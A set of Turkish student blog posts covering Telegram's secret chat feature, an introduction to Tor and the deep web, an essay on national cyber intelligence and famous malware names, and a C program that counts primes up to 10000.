<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-46-27.png"><img class="alignnone size-medium wp-image-104" src="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-46-27-168x300.png" alt="Screenshot_2014-08-14-10-46-27" width="168" height="300" /></a></p>
<p> </p>
<p>Bu resimde ise iki mesajlaşma da aynı kullanıcıya ait fakat biri normal aynı whatsapp gibi diğeri ise secret chat şifreli olan şekli.</p>
<p>Telegram adlı uygulama ise işlev olarak whatsapp ın aynısı neredeyse hiç bir farkı yok ama kişiler aktif olduğunda SECRET CHAT var bu mesajlaşma şeklinde konuşmalarımız şifrelenip yollanıyor ve telefonumuza kaydedilmiyor güvenlik açısından whatsapp a göre çok daha güvenli sanırım .</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-46-34.png"><img class="alignnone size-medium wp-image-105" src="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-46-34-168x300.png" alt="Screenshot_2014-08-14-10-46-34" width="168" height="300" /></a></p>
<p>Bu düz çizli sekmeye tıklayarak normal ve secret chat başlatabilirsiniz.</p>
<p> </p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-46-50.png"><img class="alignnone size-medium wp-image-106" src="http://www.gurelahmet.com/wp-content/uploads/2014/08/Screenshot_2014-08-14-10-46-50-168x300.png" alt="Screenshot_2014-08-14-10-46-50" width="168" height="300" /></a></p>
<p> </p>
<p>Secret chat ın son bir güzel özelliği daha var bunu bilerek sona sakladım :) Gönderdiğiniz mesajları ve medyaları belli bir zaman sonra hem sızın telefonunuzdan hemde karşı taraftan silinmesini istiyorsunuz okusun silinsin çok güzel diyorsanız secret chat açtıktan sonra saat sekmesine tıklayarak ne kadar zaman sonra silineceğiniz seçmeniz yeterlı daha sonra telegram o sure sonunda ıkı telefondanda mesajları siliyor.</p>
<p>Telegram Android ve İos da bulunmaktadır.Uygulama marketlerinden ücretsiz indirebilirsiniz.</p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Deep Web ve Tor Browser2014-07-03T17:17:00+00:00ahmetgurel.github.io/ahmia.fi/deep%20web/derin%20internet/nicola%20tesla/nicola%20tesla%20gizli%20projeler/onion/siber%20g%C3%BCvenlik/tor/tor%20browser/yasak%20internet/2014/07/03/deep-web-ve-tor-browser<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/0.jpg"><img class="size-full wp-image-88 aligncenter" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/0.jpg" alt="0" width="290" height="174" /></a></p>
<p><strong>Deep Web ( Derin İnternet ) Nedir ve Nasıl Girilir?</strong></p>
<p>Derin internet dediğimiz normal arama motorların göstermediği .onion uzantılı sitelerden oluşan internettir.</p>
<p>Aynı zamanda bilinen tarayıcıların açmadığı Mozilla,Safari,Chrome gibi bu derin internete girmek için Tor Browser kullanılır.</p>
<p>Onion uzantılı siteler genelde harf ve sayılarla isimlendirilir kendi gizlilikleri için sık sık adres değiştirebilirler.</p>
<p> </p>
<p><strong>Deep Web de Neler Var?</strong></p>
<p>Deep web denetlemenin olmadığı insanları takip etmenin oldukça zor olduğu bir yerdir bu yüzden her türlü pislik mevcuttur.</p>
<p>Çocuk pornosu,Uyuşturucu madde satanlar,Silah tüccarları,Hırsızlar,Kiralık Katiller,Teröristler,Chat odaları,Sahte belge temini,Hackerlar,Her türlü ölü resimleri,Katliam fotoğrafları,bir çok gizli ve yalan belge bulunmaktadır.</p>
<p>Bunların yanında yararlı belgelerde bulunmaktadır.Yeterince bilgilenmeden önlem almadan bu sitelerden dosya indirmek ve buradaki kişilerle ne amaçla olursa olsun bağlantı kurmak kötü sonuçlar doğurabilir girmek yerine Google deep web yazıp görsel arama yaptırırsanız deep web in içeriği hakkında bilgi sahibi olursunuz.</p>
<p> </p>
<p><a href="http://www.gurelahmet.com/deep web"><img class="aligncenter wp-image-89 size-medium" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/jZCXQ-300x257.jpg" alt="deep web" width="300" height="257" /></a></p>
<p> </p>
<p><strong>Tor ve Tor Browser Nedir?</strong></p>
<p>Tor project internette anonimliği sağlamak adı altında başlamış projedir.Tor sanal tüneller sayesinde bağlantıları gizleyerek kişinin güvenliğini ve gizliliğini sağlayan bir ağdır.</p>
<p>Tor Browser de açık kaynaklı Mozilla tarayıcının modifeye edilmesiyle oluşturulmuş tarayıcıdır ve Tor ağı ile bağlantı kurmamızı sağlar.</p>
<p> </p>
<p><strong>Yazıyı Okuyup Hala Deep Web e Girmek İsteyenler İçin Deep Web e Giriş:</strong></p>
<p>1-https://www.torproject.org adresinden Tor Browser i indiriyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/1.png"><img class="alignnone size-medium wp-image-90" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/1-300x181.png" alt="1" width="300" height="181" /></a></p>
<p>2- Tarayıcının açılması biraz zaman alabilir ve normal tarayıcılara göre çok daha yavaştır.Açıldıktan sonra .onion uzantılı siteleri gösteren https://ahmia.fi/address/ sitesine giriyoruz.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/2.png"><img class="alignnone size-medium wp-image-91" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/2-300x161.png" alt="2" width="300" height="161" /></a></p>
<p> </p>
<p>3-Ben burada library aratarak döküman tutan onion uzantılı siteleri aradım.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/3.png"><img class="alignnone size-medium wp-image-92" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/3-300x170.png" alt="3" width="300" height="170" /></a></p>
<p> </p>
<p>4-İkincı sıradaki http://am4wuhz3zifexz5u.onion/ sitesine girdim buradan English i seçerek devam ettim</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/4.png"><img class="alignnone size-medium wp-image-93" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/4-300x162.png" alt="4" width="300" height="162" /></a></p>
<p>5-Burada bir çok klasör bulunmakta benim dikkatimi<strong> Nikola.Tesla.eBook.Collection</strong> çekti ve ben buna girdim buradakı dosyaları indirmeniz ve burada ki kişilerle irtibat kurmanız yanlış sonuçlar doğurabilir benım gösterdiğim site dökuman arşivi tutan bir site yukarıda deep web de nasıl sitelerin ve kişilerin olduğunu söyledim uzak durmanızda fayda var :)</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/5.png"><img class="alignnone size-medium wp-image-94" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/5-300x167.png" alt="5" width="300" height="167" /></a> <a href="http://www.gurelahmet.com/wp-content/uploads/2014/07/6.png"><img class="alignnone size-medium wp-image-95" src="http://www.gurelahmet.com/wp-content/uploads/2014/07/6-300x141.png" alt="6" width="300" height="141" /></a></p>
<p> </p>
<p><strong>Yazım burada sona eriyor bir sonra ki yazıda görüşmek üzere :)</strong></p>
<p style="color: #222222;">Ahmet Gürel</p>
<p style="color: #222222;">SDÜ Yazılım Kulübü Yönetim Kurulu Üyesi</p>
<p style="color: #222222;">Süleyman Demirel Üniversitesi Bilgisayar Mühendisliği</p>
<p style="color: #222222;">Blog: <a style="color: #1155cc;" href="http://www.gurelahmet.com/" target="_blank">www.gurelahmet.com</a> | Mail: <a style="color: #1155cc;" href="mailto:ahmet@gurelahmet.com" target="_blank">ahmet@gurelahmet.com</a></p>
<p> </p>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
Siber İstihbaratın Ülkeler için Önemi ve Dünyada Siber İstihbarat Şirketleri2014-06-01T01:17:00+00:00ahmetgurel.github.io/%C4%B1ntelrad/prodaft/siber%20g%C3%BCvenlik/siber%20istihbarat/2014/06/01/siber-istihbarat%c4%b1n-%c3%bclkeler-i%c3%a7in-%c3%b6nemi-ve-d%c3%bcnyada-siber-istihbarat-%c5%9firketleri<p><strong>Siber İstihbaratın Ülkeler için Önemi ve Dünyada Siber İstihbarat Alanında Faaliyet Gösteren Firmalar</strong></p>
<p><strong> </strong></p>
<p><strong>SİBER İSTİHBARATIN ÖNEMİ VE DÜNYADAKİ YERİ</strong></p>
<p>Siber istihbarat nedir?</p>
<p>Neden bu kadar önemlidir?</p>
<p>Nasıl elde edilir?</p>
<p>Kimler tarafından kullanılır?</p>
<p>Konu başlığını okuyunca akla gelen sorular ya da yazıyı okuduğunuzda cevaplayabileceğiniz sorulardan bazıları bunlardır.</p>
<p>Siber İstihbarat’a girmeden önce Siber Güvenlik, Siber Eylemler ve savaşlara kısaca değinmek gerekir. İstihbarat, günlük hayatta polislerin, askerlerin, devletlerin ve insanların başvurduğu önemli bir avantajdır. Polis bir suçluyu ararken onun hakkındaki her şeyi istihbarat ile elde edip ona hızlıca ulaşarak suçu işlemeden ya da işledikten sonra yakalanmasını sağlar. Bu sayede suçlu herhangi bir kişi ya da kuruma zarar vermemiş olur. Bu ülkeler arasındaki savaşlarda, siber savaşlarda ve eylemlerde de böyledir. Durum böyle olunca siber istihbaratın önemini anlamış oluyoruz. Bir suçu işlenmeden yada işlendikten hemen sonra tespit edilmesi, başka sistemlere zarar gelmeden yakalanması veya etkisiz hala getirilmesi için çok önemlidir. Fakat Siber Güvenlik ve Siber Suçlar yeni yeni tanınırken birçok ülke yeni girişimlere başlamıştır. Hatta yasalar yeniden Siber Suçlara göre düzenlenmekte birçok ülke Siber Eylem planı yayınlamakta bizim ülkemizin de <strong>Ulusal Siber Güvenlik Stratejisi ve 2013-2014 Eylem Planı</strong> 20 Haziran 2013 günü Resmi Gazetede yayınlanmıştır. Durum böyle olunca suçlar artmakta yasalar düzenlenmekte fakat bu suçlara ne kadar geri cevap verebiliyoruz ne kadar yetişmiş elemanımız var bu suçlar işlendiğinde farkında olabiliyor muyuz? Dünyada Siber ordular kurulurken siber savaşlar olmaya başlamışken siber saldırılar arttıkça bu savaşlarda eylemlerde avantajlı olabilmemiz için <strong>SİBER İSTİHBARATA </strong>ihtiyacımız var fakat bunu dünyada sağlayan sayılı şirketler var hatta sağladığını iddia eden şirketlerin bazıları pasif verilerle sunduğu görülüyor.Bir mahallenin ara sokaklarına ne kadar hakimsek o mahalle ne kadar güvenliyse internetin de yer altı dünyasına ne kadar hakimiz, neler oluyor, hangi gruplar iş yapıyor bilmemiz gerekir. Bunu sağlamak için dünyada ki bir çok ülke şuan Siber İstihbarat Ağı oluşturmaya çalışıyor. Türkiyede 2013 yılında <a href="http://www.intelrad.com">INTELRAD</a> firması USTA(Ulusal Siber Tehdit Ağı) projesini geliştirdi. Bu proje tanıtıldığında diğer ülkelerin elinde bu kadar gelişmiş bir platform bulunmamaktaydı. Türkiye siber istihbarat alanında bir ilke imza atmış oldu fakat siber güvenlik siber savaşlar siber istihbarat çok geniş bir alan bu konuda dünyada hızlı ve çabuk bir şekilde gelişmekte bu gelişmeleri takip ederek siber güvenlik alanında bilinçlendirilme yapılmalıdır ve bu alanda temelden uzman kişiler yetiştirilmelidir.</p>
<p> </p>
<p> </p>
<p> </p>
<p><strong>SİBER EYLEMLER VE SAVAŞLAR</strong></p>
<p>Soğuk savaş döneminde 1957 yılında Sovyet Rusya ‘’Sputnik’’ adlı uyduyu uzaya gönderdi.Amerika’da bu durum da geride kaldığını ve Rusya’nın daha gelişmiş teknolojileri olduğunu düşünerek Nükleer Saldırılardan korunmak için bir İletişim Ağı oluşturdu.Daha sonra akademisyenler tarafından geliştirilen bu ağ İnternet oldu ve günümüze kadar gelişerek geldi.Hatta fazla gelişti tüm şirketler ülkeler her şeylerini bu ağ üzerinden yönetiyor pazarlıyor. Nasıl önemli şirketlerin kapısında hırsızlığa veya saldırılara karşı güvenlik bekliyor ya da alarmla güvenliklerini sağlıyorlarsa internetteki sayfaları ve dokümanları içinde bu böyledir. İnternetteki korsanlardan da korunmak için güvenlik uzmanı kişilerden ve güvenlik araçlarından faydalanmalıyız.Fakat bu durum bile bazen yeterli olamayabiliyor.İşte bu yüzden bir çok devlet ve şirket Siber İstihbarat merkezi gelişimine önem vermekte Siber Suç veri tabanı geliştirmeye çalışmaktadır.İnternetin yer altı dünyasındaki korsanları ve grupları inceleyerek ne tür işler yaptıklarını bulmaya çalışmaktadırlar ki bu sayede gelebilecek saldırılara karşı önlem alabilsinler.</p>
<p><strong>SİBER SAVAŞLARDA NELER KULLANILIR?</strong></p>
<p>Siber savaşlarda zararlı yazılımlar ve güvenlik yazılımları kullanılır. Sistemin zafiyetine göre bu yazılımlar ve araçlar geliştirilebilir, değiştirilebilir. İnternetin ortaya çıkmasından beri bir çok yararlı ve zararlı yazılım geliştirilmiştir. Dünyada ses getiren önemli zararlı yazılımlar şunlardır:</p>
<p>1-Stuxnet</p>
<p>2-Back Orifice</p>
<p>3-Melissa</p>
<p>4-I.love.you</p>
<p>5-Code Red</p>
<p>6-Morris Solucanı</p>
<p>7-Nimda</p>
<p>8-Blaster</p>
<p>9-Slammer</p>
<p>10-Sasser</p>
<p>11-Zeus</p>
<p>12-Conficker</p>
<p>13-Dugu</p>
<p>14-Flame</p>
<p>Yukarıdaki zararlı yazılımlar siber savaş senaryolarının gerçek dışı olmadığının kanıtıdır.Stuxnet İran Nükleer Tesisleri’ne gönderilen ve Nükleer Santral’in çalışmasını etkilemiştir.Dugu da bir başka önemli zararlı yazılımdır oda endüstriyel sistemler hakkında bilgi toplamaya yarayan bir zararlı yazılımdı. Flame’de aynı şekilde hatta diğerlerinden ayıran özellik boyutudur.Flame 20 mb boyutunda diğer zararlı yazılımlara oranla çok daha büyük ve Siber Bilgi toplamaya yönelik bir zararlı yazılımdır.Bu zararlı yazılımlar uzun bir süre anti virüsler tarafından fark edilememiştir. Hatta Stuxnet Amerikan askeri ve istihbarat yetkilileri tarafından yazılmıştır.Durum böyle olunca ülkeler savaşlarını siber alana taşımış ve Siber Savaşlar başlamıştır.Bu durumda da savaşlarda başarılı olabilmek ve gelecek saldırılardan korunmak için siber istihbarata ihtiyacımız vardır.</p>
<p><a href="http://www.gurelahmet.com/wp-content/uploads/2014/06/siberolaycizelgesi-1.png"><img class="aligncenter wp-image-81 size-full" src="http://www.gurelahmet.com/wp-content/uploads/2014/06/siberolaycizelgesi-1.png" alt="siberolaycizelgesi (1)" width="937" height="194" /></a></p>
<p> </p>
<p><strong>SİBER SAVAŞA KARŞI ALINAN ÖNLEMLER</strong></p>
<p>Rusya’nın Siber Suç Araçları,ABD‘nin Haberleşme İstihbaratı,Çin’in Endüstriyel Casusluk Kabiliyetleri vardır.Bu yetenekler diğer devletlere ve birbirleri üzerinde siber tehdit oluşturmaktadır.</p>
<p>ÜLKELERİN SİBER GÜVENLİK KAPASİTELERİ</p>
<table class="aligncenter" style="color: #595959;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="95"> ÜLKELER</td>
<td valign="top" width="73">Siber güvenlik stratejisi</td>
<td valign="top" width="57">Ulusal CERT</td>
<td valign="top" width="47">Diğer CERT</td>
<td valign="top" width="66">Siber Tatbikat</td>
<td valign="top" width="85">Siber Komutanlık</td>
<td valign="top" width="66">EGC FIRST</td>
<td valign="top" width="132">Kurum</td>
</tr>
<tr>
<td valign="top" width="95">ABD</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">X</td>
<td valign="top" width="66">FIRST</td>
<td valign="top" width="132">USCYBERCOM/NSA</td>
</tr>
<tr>
<td valign="top" width="95">Almanya</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">EGC</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Avustralya</td>
<td valign="top" width="73">3X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47"></td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">Cyber-Security Operations Centre</td>
</tr>
<tr>
<td valign="top" width="95">Avusturya</td>
<td valign="top" width="73">3x Taslak</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">-</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">-</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Brezilya</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57"></td>
<td valign="top" width="47">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="85">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">Information Security Department</td>
</tr>
<tr>
<td valign="top" width="95">Çin</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">*</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">*</td>
</tr>
<tr>
<td valign="top" width="95">Danimarka</td>
<td valign="top" width="73">-</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">EGC</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Estonya</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">EGC</td>
<td valign="top" width="132">CCDCOE (NATO)</td>
</tr>
<tr>
<td valign="top" width="95">Finlandiya</td>
<td valign="top" width="73">-</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47"></td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Fransa</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Hindistan</td>
<td valign="top" width="73">Taslak</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">Cyber Command and Control Authority.</td>
</tr>
<tr>
<td valign="top" width="95">Hollanda</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">EGC</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">İngiltere</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85"></td>
<td valign="top" width="66"></td>
<td valign="top" width="132">Cyber-security Operations Centre</td>
</tr>
<tr>
<td valign="top" width="95">İspanya</td>
<td valign="top" width="73">-</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">EGC</td>
<td valign="top" width="132">The National Intelligence Service</td>
</tr>
<tr>
<td valign="top" width="95">İsrail</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="85">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="132">*</td>
</tr>
<tr>
<td valign="top" width="95">İsveç</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85"></td>
<td valign="top" width="66">EGC</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">İtalya</td>
<td valign="top" width="73">-</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">-</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">-</td>
<td valign="top" width="132">National Computer Crime Centre for Critical Infrastructure Protection</td>
</tr>
<tr>
<td valign="top" width="95">Japonya</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66"><em>JPCERT/CC FIRST</em></td>
<td valign="top" width="132">National Information Security Centre</td>
</tr>
<tr>
<td valign="top" width="95">Kanada</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">-</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Polonya</td>
<td valign="top" width="73">-</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">-</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Romanya</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66">X</td>
<td valign="top" width="85">-</td>
<td valign="top" width="66">-</td>
<td valign="top" width="132">-</td>
</tr>
<tr>
<td valign="top" width="95">Rusya</td>
<td valign="top" width="73">X</td>
<td valign="top" width="57">X</td>
<td valign="top" width="47">X</td>
<td valign="top" width="66"></td>
<td valign="top" width="85">*</td>
<td valign="top" width="66">FIRST</td>
<td valign="top" width="132">-</td>
</tr>
</tbody>
</table>
<div style="color: #595959;">Ülkelerin Siber Güvenlik Kapasiteleri</div>
<p> </p>
<p> </p>
<p> </p>
<p><strong>SİBER İSTİHBARATIN SİBER EYLEMLERDE VE SAVAŞLARDAKİ ÖNEMİ</strong></p>
<p>Siber Savaşlar ve eylemlerin bu kadar arttığı ve önemli olduğu bir zamanda ülkelerin Siber Ordular kurup Siber Eylem Planları hazırladıkları ve Siber Savaşlardan korunmak yada Siber Savaş Saldırısı yapma gibi önemli fikirleri var.Bir çok ülke bu alanda kendini geliştiriyor fakat şuan Siber İstihbarat alanında dünyada tam anlamıyla hizmet veren sayılı şirket ve kurum bulunmakta.Ama unutulmamalıdır ki Siber Güvenlik ve Siber Savaşın bu kadar geliştiği zamanda Siber İstihbaratı zayıf kurum kuruluşlar ve devletler bu savaşı kaybetmeye başlayacak ya da çok büyük zarar görecektir.Bu yüzden Siber İstihbarat’ı tüm devletler,bankalar ve havacılık sektörü gibi önemli bilgi içeren şirketler kullanabilir.Siber İstihbarat’ın güncel ve aktif olması gerçekleşen bir Siber Olayı hemen veri tabanına ekleyerek başka bir Siber Olay olmadan önce uyarması ve önlem alınması gerekir.</p>
<p> </p>
<p> </p>
<p> </p>
<p><strong> Siber İstihbarat Alanında Faaliyet Gösteren Firmalar & Kuruluşlar</strong></p>
<p><strong>İSİMLERİ </strong> <strong>ÜLKELERİ</strong> <strong>SERVİSLERİ</strong></p>
<p><a href="https://www.intelrad.com">INTELRAD</a> & <a href="https://www.prodaft.com">PRODAFT </a> TÜRKİYE U.S.T.A(ULUSAL SİBER TEHDİT AĞI)</p>
<p>Advanced Concepts ABD Cybet Threat Intelligence</p>
<p>Research Group</p>
<p>SpeairTip ABD Cyber Counterintelligence</p>
<p>Verisign ABD Security Intelligence</p>
<p>National Security Agency ABD Cyber Intelligence</p>
<p> </p>
<p>Bu alanda hizmet veren bazı şirketler bunlardır .Diğer şirketlerede <a href="http://www.zoominfo.com/k/cyber-intelligence">http://www.zoominfo.com/k/cyber-intelligence</a> adresinden göz atabilirsiniz.</p>
<p><strong>KAYNAKÇALAR:</strong></p>
<p>1-http://www.siberguvenlik.org.tr/2012/12/siber-savaslar-baslangc.html</p>
<p>2-http://www.siberguvenlik.org.tr/2013/01/siber-savaslar-5-boyutta-savas.html</p>
<p>3-http://www.21yyte.org/tr/arastirma/terorizm-ve-terorizmle-mucadele/2011/09/23/6309/siber-teror-ve-siber-istihbarat</p>
<p>4-http://www.radikal.com.tr/turkiye/siber_guvenlik_ustaya_emanet-1159446</p>
<p>5- http://www.teakolik.com/gelecegin-siber-tehditleri/</p>
<p>6-http://www.lockheedmartin.com/us/what-we-do/information-technology/cyber-security/cyber-intelligence-professional.html</p>
<p>7-http://www.alperbasaran.com/2013/01/savas-diyoruz-ama-askerimiz-yok.html</p>
<p>8- http://siberistihbarat.com/</p>
<p>9- http://tr.wikipedia.org/wiki/Stuxnet</p>
<p>10-http://www.zoominfo.com/k/cyber-intelligence</p>
<p>11-http://www.acrg-llc.com/cyber_threat_intelligence.php</p>
<p>12- http://www.speartip.com/fusion-cell-analysis/threat-intelligence-predictive-counterintelligence/</p>
<p>13- http://www.verisigninc.com/en_US/cyber-security/security-intelligence/index.xhtml</p>
<p><strong> </strong></p>
<p><strong>İLETİŞİM</strong></p>
<p>Ahmet Gürel</p>
<p>SDÜ Yazılım Kulübü Başkan Yardımcısı</p>
<p>Süleyman Demirel Üniversitesi Bilgisayar Mühendisliği</p>
<table>
<tbody>
<tr>
<td>Blog: www.gurelahmet.com</td>
<td>Mail: ahmet@gurelahmet.com</td>
</tr>
</tbody>
</table>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-65335586-1', 'auto');
ga('send', 'pageview');
</script>
C & Java Dilinde Asalsayılar2014-05-13T14:08:00+00:00ahmetgurel.github.io/asalsayi/asalsayi%20algoritmas%C4%B1/c/c%20de%20asalsayi/java/java%20da%20asalsayi/java%20se/2014/05/13/c-java-dilinde-asalsayilar<div class="separator" style="clear: both; text-align: center;"><a href="http://gurelahmet.com/wp-content/uploads/2014/05/1.jpg"><img class="alignnone size-medium wp-image-31" src="http://gurelahmet.com/wp-content/uploads/2014/05/1-237x300.jpg" alt="1" width="237" height="300" /></a></div>
<p>Evet uzun bir süredir bloga yazmadığımın farkına varmıs bulunmaktayım bu sırada ikinci dönem basladı ve ilk vizelerim bitti hatta C dili yerıne JAVA öğrenmeye başladık.Tabi ki ufak farklılıklar olsada önemli olan her zaman algoritma ve programlama mantığı yanı hemen hemen hepsı bır bırıne benzer fazla uzatmadan ilköğretim 4 .sınıftan beri gördüğümüz matematiğin vazgeçilmezi olan ASAL SAYILAR a değinelim bugün :) Hem basit bir konu hemde programlama mantığı C & JAVA arasındaki farklılıkları görelim C dilinide unutmayalım :)</p>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>1 ile 10000 arasındaki asalsayıları ekrana yazdıran ve toplam kaç tane asal sayının olduğunu gösteren programı C & JAVA dilinde kodlarını yazalım.
</code></pre>
<p>Asal sayılar dendiğinde sadece 1 e ve kendisine bölünen sayılar olarak tanımlanmakta bunu programlama diline aktarırken nasıl bulucaz nasıl bır mantığı olacak algoritmadaki sayac programlama dilindeki döngü baya bir işimize yarayacak diye düşünüyorum :) Sonuçta 1 ve kendısıne bölünüyor 2 tane böleni var ise bu iki böleni sayıp bir koşula baglarsak 2 böleni var ise asal sayi bölen sayısı 2 den farklı ise asal değil gibi bir mantık izleyeceğiz tabi ki asal sayıyı bulduk fakat 1 ile 10000 arasında kac tane asal sayının oldugunu bulmamız için bunları bir sayaç ile saymamız gerekiyor asalsayi adında bir sayac tanımlayıp bölen=2 koşulunda onuda bir artırarak bu işlemi yapmış olacağız bu sefer kodları 2 dilde yazacağım C ve JAVA da iki dilin arasındaki farklılarıda görelim ama programlama mantığının aynı olduğunuda gösterelim istiyorum.</p>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>C DİLİNDE</code></pre>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>/* Ahmet GÜREL
Süleyman Demirel University Yazılım Kulübü | Yönetim Kurulu Üyesi
Süleyman Demirel University| Computer Engineering
www.gurelahmet.com | www.twitter.com/ahmtgrll
ahmetgurel.yazilim@gmail.com */
#include<stdio.h>
#include<conio.h>
main(){
int bolen=0,asalsayi=0,i,j;
for( i=1;i<=10000;i++){
bolen=0;
for(j=1;j<=i;j++){
if(i%j==0)
bolen+=1;
}
if(bolen==2){
printf("Asalsayi: %d \n", i);
asalsayi+=1;
}
}
printf("1 ile 10000 arasinda %d asal sayi vardir \n", asalsayi);
getch();
}
